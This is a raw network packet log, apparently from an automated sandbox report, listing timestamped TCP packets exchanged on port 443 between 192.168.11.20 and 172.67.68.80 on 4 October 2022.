                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931360960 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931360960 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931478024 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931484938 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931510925 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931519032 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931610107 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931658983 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931667089 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931809902 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931812048 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931819916 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.932050943 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.932136059 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.932142973 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.932221889 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.932229996 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.932404995 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.932414055 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.932503939 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.932557106 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.932838917 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.932852983 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.933028936 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.933070898 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.933079004 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.933140039 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.933182955 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.933238983 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.933403969 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.933413029 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.933511972 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.933759928 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.933772087 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.933862925 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.933868885 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.933990955 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.934021950 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.934137106 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.934139013 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.934145927 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.934215069 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.934294939 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.934465885 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.934597969 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.934611082 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.934817076 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.934823990 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.934890032 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.935029030 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.935220003 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.935233116 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.935437918 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.935445070 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.935492039 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.935596943 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.935652018 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.935657978 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.935762882 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.935769081 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.935817003 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.935930014 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.935937881 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936012983 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936024904 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936105013 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936110973 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936203003 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936288118 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936517954 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936530113 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936655998 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936743021 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936749935 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936798096 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936829090 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936923027 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.936928988 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937144041 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937186003 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937201023 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937400103 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937407970 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937434912 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937516928 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937524080 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937625885 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937638998 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937702894 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937710047 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937865019 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937932014 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937984943 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.937998056 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.938172102 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.938173056 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.938174963 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.938182116 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.938282013 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.938364983 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.938414097 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.938524961 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.938529968 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.938750982 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.938968897 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.938982010 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.939101934 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.939162016 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.939237118 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.939244032 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.939336061 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.939420938 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.939426899 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.939515114 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.939517975 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.939758062 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.939913988 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.939925909 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940063953 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940119028 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940125942 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940166950 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940259933 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940299034 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940305948 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940388918 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940443039 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940469980 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940556049 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940562963 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940711975 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940717936 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940828085 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.940831900 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.941067934 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.941176891 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.941190004 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.941318035 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.941370010 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.941375971 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.941464901 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.941468000 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.941483974 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.941549063 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.941709995 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.941716909 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.941850901 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.941996098 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.942202091 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.942215919 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.942378998 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.942404985 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.942411900 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.942467928 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.942543983 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.942635059 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.942641973 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.942747116 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.942753077 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.942816973 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.942888021 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943025112 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943032026 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943125010 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943133116 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943172932 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943393946 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943399906 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943487883 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943583965 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943675041 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943686962 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943823099 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943871021 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943876982 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.943967104 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944025993 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944052935 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944060087 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944066048 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944240093 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944390059 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944540024 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944552898 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944673061 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944762945 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944770098 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944864035 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944876909 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944876909 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.944982052 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945031881 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945039034 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945095062 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945163965 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945221901 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945278883 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945365906 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945374012 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945478916 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945570946 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945633888 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945682049 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945687056 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945753098 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.945823908 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946038008 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946041107 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946047068 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946202040 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946208954 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946362972 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946365118 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946372032 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946414948 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946445942 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946494102 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946594000 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946597099 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946603060 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946696997 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946814060 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946830034 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946903944 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946909904 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.946968079 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947072029 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947119951 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947125912 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947175026 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947187901 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947263002 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947400093 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947407961 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947432995 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947629929 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947724104 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947730064 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947828054 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947870970 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.947985888 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948016882 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948024988 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948092937 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948335886 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948348999 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948362112 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948487997 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948668957 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948676109 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948704958 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948791027 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948831081 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948837996 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948879957 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948985100 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.948992014 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949069023 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949158907 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949166059 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949199915 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949204922 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949331045 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949338913 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949441910 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949448109 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949513912 CEST49835443192.168.11.20172.67.68.80
